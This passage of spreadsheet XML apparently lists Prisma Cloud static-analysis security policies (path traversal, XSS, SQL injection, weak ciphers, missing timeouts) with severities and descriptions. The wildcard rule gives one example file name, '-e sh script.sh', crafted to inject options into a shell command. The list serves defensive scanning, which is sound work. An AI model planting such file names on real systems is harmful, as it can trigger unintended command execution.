          <t>Avoid direct user input with ModelAndView &amp; HttpRequest.getRequestDispatcher() methods to prevent unauthorized file access. In Spring MVC, these can expose restricted files.</t>
        </is>
      </c>
      <c r="X369" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-8</t>
        </is>
      </c>
      <c r="Y369" t="inlineStr"/>
      <c r="Z369" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA369" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB369" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC369" t="inlineStr">
        <is>
          <t>CKV3_SAST_8</t>
        </is>
      </c>
      <c r="AD369" t="b">
        <v>1</v>
      </c>
      <c r="AE369" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF369" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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69" t="inlineStr">
        <is>
          <t>ec7157cd-4c58-4ad2-9594-bcc56b68c53c</t>
        </is>
      </c>
      <c r="AI369" t="inlineStr"/>
      <c r="AJ369" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK369" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" t="inlineStr"/>
      <c r="B370" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C370" s="2" t="inlineStr"/>
      <c r="D370" t="inlineStr"/>
      <c r="E370" t="inlineStr"/>
      <c r="F370" t="inlineStr"/>
      <c r="G370" t="b">
        <v>1</v>
      </c>
      <c r="H3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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J370" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K370" t="inlineStr">
        <is>
          <t>Pathname not restricted in HTTP requests</t>
        </is>
      </c>
      <c r="L370" t="inlineStr"/>
      <c r="M370" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N370" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O370" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P370" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q370" t="inlineStr"/>
      <c r="R370" t="inlineStr"/>
      <c r="S370" t="inlineStr"/>
      <c r="T370" t="b">
        <v>0</v>
      </c>
      <c r="U370" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V370" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W370" t="inlineStr">
        <is>
          <t>The software uses an HTTP request parameter to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as \"/abs/path\" that can resolve to a location that is outside of that directory.</t>
        </is>
      </c>
      <c r="X370" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-45</t>
        </is>
      </c>
      <c r="Y370" t="inlineStr"/>
      <c r="Z370" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA370" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB370" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC370" t="inlineStr">
        <is>
          <t>CKV3_SAST_45</t>
        </is>
      </c>
      <c r="AD370" t="b">
        <v>1</v>
      </c>
      <c r="AE370" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF370" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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0" t="inlineStr">
        <is>
          <t>4c30449d-299b-4a5f-959f-be19d191aa33</t>
        </is>
      </c>
      <c r="AI370" t="inlineStr"/>
      <c r="AJ370" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK370" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" t="inlineStr"/>
      <c r="B371" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C371" s="2" t="inlineStr"/>
      <c r="D371" t="inlineStr"/>
      <c r="E371" t="inlineStr"/>
      <c r="F371" t="inlineStr"/>
      <c r="G371" t="b">
        <v>1</v>
      </c>
      <c r="H3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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J371" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K371" t="inlineStr">
        <is>
          <t>Cross-site scripting (XSS) exposure</t>
        </is>
      </c>
      <c r="L371" t="inlineStr"/>
      <c r="M371" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N371" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O371" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P371" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q371" t="inlineStr"/>
      <c r="R371" t="inlineStr"/>
      <c r="S371" t="inlineStr"/>
      <c r="T371" t="b">
        <v>0</v>
      </c>
      <c r="U371" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V371" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W371" t="inlineStr">
        <is>
          <t>HTTP response should not contain user's code</t>
        </is>
      </c>
      <c r="X371" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-89</t>
        </is>
      </c>
      <c r="Y371" t="inlineStr"/>
      <c r="Z371" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA371" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB371" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC371" t="inlineStr">
        <is>
          <t>CKV3_SAST_89</t>
        </is>
      </c>
      <c r="AD371" t="b">
        <v>1</v>
      </c>
      <c r="AE371" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF371" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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1" t="inlineStr">
        <is>
          <t>1549f51a-265d-444c-bfde-512a3a293add</t>
        </is>
      </c>
      <c r="AI371" t="inlineStr"/>
      <c r="AJ371" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK371" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" t="inlineStr"/>
      <c r="B372" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C372" s="2" t="inlineStr"/>
      <c r="D372" t="inlineStr"/>
      <c r="E372" t="inlineStr"/>
      <c r="F372" t="inlineStr"/>
      <c r="G372" t="b">
        <v>1</v>
      </c>
      <c r="H3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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J372" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K372" t="inlineStr">
        <is>
          <t>DOM updates should not lead to cross-site scripting (XSS) attacks.</t>
        </is>
      </c>
      <c r="L372" t="inlineStr"/>
      <c r="M372" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N372" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O372" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P372" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q372" t="inlineStr"/>
      <c r="R372" t="inlineStr"/>
      <c r="S372" t="inlineStr"/>
      <c r="T372" t="b">
        <v>0</v>
      </c>
      <c r="U372" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V372" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W372" t="inlineStr">
        <is>
          <t>DOM updates via document.write, document.writeln, node.innerHTML and node.outerHTML should not contains exploits.</t>
        </is>
      </c>
      <c r="X372" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-196</t>
        </is>
      </c>
      <c r="Y372" t="inlineStr"/>
      <c r="Z372" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA372" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB372" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC372" t="inlineStr">
        <is>
          <t>CKV3_SAST_196</t>
        </is>
      </c>
      <c r="AD372" t="b">
        <v>1</v>
      </c>
      <c r="AE372" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF372" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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2" t="inlineStr">
        <is>
          <t>9743b4fb-4e52-484e-bc51-e8700e9f99aa</t>
        </is>
      </c>
      <c r="AI372" t="inlineStr"/>
      <c r="AJ372" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK372" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" t="inlineStr"/>
      <c r="B373" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C373" s="2" t="inlineStr"/>
      <c r="D373" t="inlineStr"/>
      <c r="E373" t="inlineStr"/>
      <c r="F373" t="inlineStr"/>
      <c r="G373" t="b">
        <v>1</v>
      </c>
      <c r="H3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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J373" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K373" t="inlineStr">
        <is>
          <t>Cookie Security Overly Permissive Samesite Attribute</t>
        </is>
      </c>
      <c r="L373" t="inlineStr"/>
      <c r="M373" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N373" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O373" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P373" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q373" t="inlineStr"/>
      <c r="R373" t="inlineStr"/>
      <c r="S373" t="inlineStr"/>
      <c r="T373" t="b">
        <v>0</v>
      </c>
      <c r="U373" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V373" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W373" t="inlineStr">
        <is>
          <t>Set the Samesite cookie attribute to 'Strict' and ensure the secure flag is enabled.</t>
        </is>
      </c>
      <c r="X373" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-95</t>
        </is>
      </c>
      <c r="Y373" t="inlineStr"/>
      <c r="Z373" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA373" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB373" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC373" t="inlineStr">
        <is>
          <t>CKV3_SAST_95</t>
        </is>
      </c>
      <c r="AD373" t="b">
        <v>1</v>
      </c>
      <c r="AE373" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF373" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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3" t="inlineStr">
        <is>
          <t>06ed26dc-a994-4ab1-a7af-37c2571bb6f0</t>
        </is>
      </c>
      <c r="AI373" t="inlineStr"/>
      <c r="AJ373" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK373" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" t="inlineStr"/>
      <c r="B374" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C374" s="2" t="inlineStr"/>
      <c r="D374" t="inlineStr"/>
      <c r="E374" t="inlineStr"/>
      <c r="F374" t="inlineStr"/>
      <c r="G374" t="b">
        <v>1</v>
      </c>
      <c r="H3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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J374" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K374" t="inlineStr">
        <is>
          <t>Improper neutralization of wildcards</t>
        </is>
      </c>
      <c r="L374" t="inlineStr"/>
      <c r="M374" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N374" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O374" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P374" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q374" t="inlineStr"/>
      <c r="R374" t="inlineStr"/>
      <c r="S374" t="inlineStr"/>
      <c r="T374" t="b">
        <v>0</v>
      </c>
      <c r="U374" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V374" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W374" t="inlineStr">
        <is>
          <t>Detected use of the wildcard character in a system call that spawns a shell.This subjects the wildcard to normal shell expansion, which can have unintended consequencesif there exist any non-standard file names. Consider a file named `-e sh script.sh`.</t>
        </is>
      </c>
      <c r="X374" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-170</t>
        </is>
      </c>
      <c r="Y374" t="inlineStr"/>
      <c r="Z374" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA374" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB374" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC374" t="inlineStr">
        <is>
          <t>CKV3_SAST_170</t>
        </is>
      </c>
      <c r="AD374" t="b">
        <v>1</v>
      </c>
      <c r="AE374" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF374" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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4" t="inlineStr">
        <is>
          <t>cf6c02c2-0d6c-495d-beb3-0e41880a0072</t>
        </is>
      </c>
      <c r="AI374" t="inlineStr"/>
      <c r="AJ374" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK374" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" t="inlineStr"/>
      <c r="B375" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C375" s="2" t="inlineStr"/>
      <c r="D375" t="inlineStr"/>
      <c r="E375" t="inlineStr"/>
      <c r="F375" t="inlineStr"/>
      <c r="G375" t="b">
        <v>1</v>
      </c>
      <c r="H3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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J375" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K375" t="inlineStr">
        <is>
          <t>Missing HTTP server timeouts</t>
        </is>
      </c>
      <c r="L375" t="inlineStr"/>
      <c r="M375" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N375" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O375" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P375" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q375" t="inlineStr"/>
      <c r="R375" t="inlineStr"/>
      <c r="S375" t="inlineStr"/>
      <c r="T375" t="b">
        <v>0</v>
      </c>
      <c r="U375" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V375" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W375" t="inlineStr">
        <is>
          <t>This policy identifies instances where Go's net/http serve functions are used without properly configured timeouts. Without timeouts, the server may be vulnerable to resource consumption attacks, where an adversary opens numerous connections without completing data transmission or terminating the connections. This can lead to the server being unable to accept new connections. It is recommended to set appropriate timeouts in the net/http server to mitigate this risk.</t>
        </is>
      </c>
      <c r="X375" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-256</t>
        </is>
      </c>
      <c r="Y375" t="inlineStr"/>
      <c r="Z375" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA375" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB375" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC375" t="inlineStr">
        <is>
          <t>CKV3_SAST_256</t>
        </is>
      </c>
      <c r="AD375" t="b">
        <v>1</v>
      </c>
      <c r="AE375" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF375" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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5" t="inlineStr">
        <is>
          <t>9fb8abd5-121c-44bf-a9c8-01d20bf5d8f7</t>
        </is>
      </c>
      <c r="AI375" t="inlineStr"/>
      <c r="AJ375" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK375" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" t="inlineStr"/>
      <c r="B376" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C376" s="2" t="inlineStr"/>
      <c r="D376" t="inlineStr"/>
      <c r="E376" t="inlineStr"/>
      <c r="F376" t="inlineStr"/>
      <c r="G376" t="b">
        <v>1</v>
      </c>
      <c r="H3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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J376" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K376" t="inlineStr">
        <is>
          <t>Insecure SSL Server Identity Verification Disabled</t>
        </is>
      </c>
      <c r="L376" t="inlineStr"/>
      <c r="M376" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N376" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O376" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P376" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q376" t="inlineStr"/>
      <c r="R376" t="inlineStr"/>
      <c r="S376" t="inlineStr"/>
      <c r="T376" t="b">
        <v>0</v>
      </c>
      <c r="U376" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V376" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W376" t="inlineStr">
        <is>
          <t>Avoid using insecure functions that may disable SSL/TLS certificate validation. It should only be used for debugging purposes and not in production code.</t>
        </is>
      </c>
      <c r="X376" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-101</t>
        </is>
      </c>
      <c r="Y376" t="inlineStr"/>
      <c r="Z376" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA376" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB376" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC376" t="inlineStr">
        <is>
          <t>CKV3_SAST_101</t>
        </is>
      </c>
      <c r="AD376" t="b">
        <v>1</v>
      </c>
      <c r="AE376" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF376" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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6" t="inlineStr">
        <is>
          <t>8802ca75-6b56-4d9b-80da-87c32bc84673</t>
        </is>
      </c>
      <c r="AI376" t="inlineStr"/>
      <c r="AJ376" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK376" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" t="inlineStr"/>
      <c r="B377" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C377" s="2" t="inlineStr"/>
      <c r="D377" t="inlineStr"/>
      <c r="E377" t="inlineStr"/>
      <c r="F377" t="inlineStr"/>
      <c r="G377" t="b">
        <v>1</v>
      </c>
      <c r="H3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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J377" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K377" t="inlineStr">
        <is>
          <t>Encryption algorithm not using secure modes and padding</t>
        </is>
      </c>
      <c r="L377" t="inlineStr"/>
      <c r="M377" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N377" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O377" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P377" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q377" t="inlineStr"/>
      <c r="R377" t="inlineStr"/>
      <c r="S377" t="inlineStr"/>
      <c r="T377" t="b">
        <v>0</v>
      </c>
      <c r="U377" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V377" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W377" t="inlineStr">
        <is>
          <t>Use encryption modes and padding schemes that ensure data confidentiality, integrity, and authenticity. For block cipher encryption algorithms, avoid using the ECB mode as it doesn't provide serious message confidentiality. Avoid using CBC with padding due to vulnerability to padding oracle attacks. Use modes like GCM, CCM, CWC, EAX, IAPM, and OCB, as they are designed to provide both data authenticity and confidentiality. For RSA encryption, use the OAEP padding scheme.</t>
        </is>
      </c>
      <c r="X377" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-75</t>
        </is>
      </c>
      <c r="Y377" t="inlineStr"/>
      <c r="Z377" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA377" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB377" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC377" t="inlineStr">
        <is>
          <t>CKV3_SAST_75</t>
        </is>
      </c>
      <c r="AD377" t="b">
        <v>1</v>
      </c>
      <c r="AE377" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF377" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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7" t="inlineStr">
        <is>
          <t>4bee9e41-e34d-4de1-b9e9-2adbea88ab8d</t>
        </is>
      </c>
      <c r="AI377" t="inlineStr"/>
      <c r="AJ377" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK377" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" t="inlineStr"/>
      <c r="B378" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C378" s="2" t="inlineStr"/>
      <c r="D378" t="inlineStr"/>
      <c r="E378" t="inlineStr"/>
      <c r="F378" t="inlineStr"/>
      <c r="G378" t="b">
        <v>1</v>
      </c>
      <c r="H3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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J378" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K378" t="inlineStr">
        <is>
          <t>Improper neutralization of inputs used in an SQL query</t>
        </is>
      </c>
      <c r="L378" t="inlineStr"/>
      <c r="M378" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N378" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O378" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P378" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q378" t="inlineStr"/>
      <c r="R378" t="inlineStr"/>
      <c r="S378" t="inlineStr"/>
      <c r="T378" t="b">
        <v>0</v>
      </c>
      <c r="U378" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V378" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W378" t="inlineStr">
        <is>
          <t>The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.</t>
        </is>
      </c>
      <c r="X378" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-178</t>
        </is>
      </c>
      <c r="Y378" t="inlineStr"/>
      <c r="Z378" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA378" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB378" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC378" t="inlineStr">
        <is>
          <t>CKV3_SAST_178</t>
        </is>
      </c>
      <c r="AD378" t="b">
        <v>1</v>
      </c>
      <c r="AE378" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF378" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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8" t="inlineStr">
        <is>
          <t>fcc9a4cd-df19-4596-acc9-2ba6286dab48</t>
        </is>
      </c>
      <c r="AI378" t="inlineStr"/>
      <c r="AJ378" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK378" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" t="inlineStr"/>
      <c r="B379" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C379" s="2" t="inlineStr"/>
      <c r="D379" t="inlineStr"/>
      <c r="E379" t="inlineStr"/>
      <c r="F379" t="inlineStr"/>
      <c r="G379" t="b">
        <v>1</v>
      </c>
      <c r="H3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79" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J379" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K379" t="inlineStr">
        <is>
          <t>Cleartext transmission of sensitive information</t>
        </is>
      </c>
      <c r="L379" t="inlineStr"/>
      <c r="M379" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N379" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O379" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P379" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q379" t="inlineStr"/>
      <c r="R379" t="inlineStr"/>
      <c r="S379" t="inlineStr"/>
      <c r="T379" t="b">
        <v>0</v>
      </c>
      <c r="U379" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V379" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W379" t="inlineStr">
        <is>
          <t>FTP/Telnet does not encrypt communications by default. This can lead to sensitive data being exposed. Ensure use of FTP here does not expose sensitive data. Use SSH/SFTP/SCP orsome other encrypted protocol</t>
        </is>
      </c>
      <c r="X379" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-93</t>
        </is>
      </c>
      <c r="Y379" t="inlineStr"/>
      <c r="Z379" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA379" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB379" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC379" t="inlineStr">
        <is>
          <t>CKV3_SAST_93</t>
        </is>
      </c>
      <c r="AD379" t="b">
        <v>1</v>
      </c>
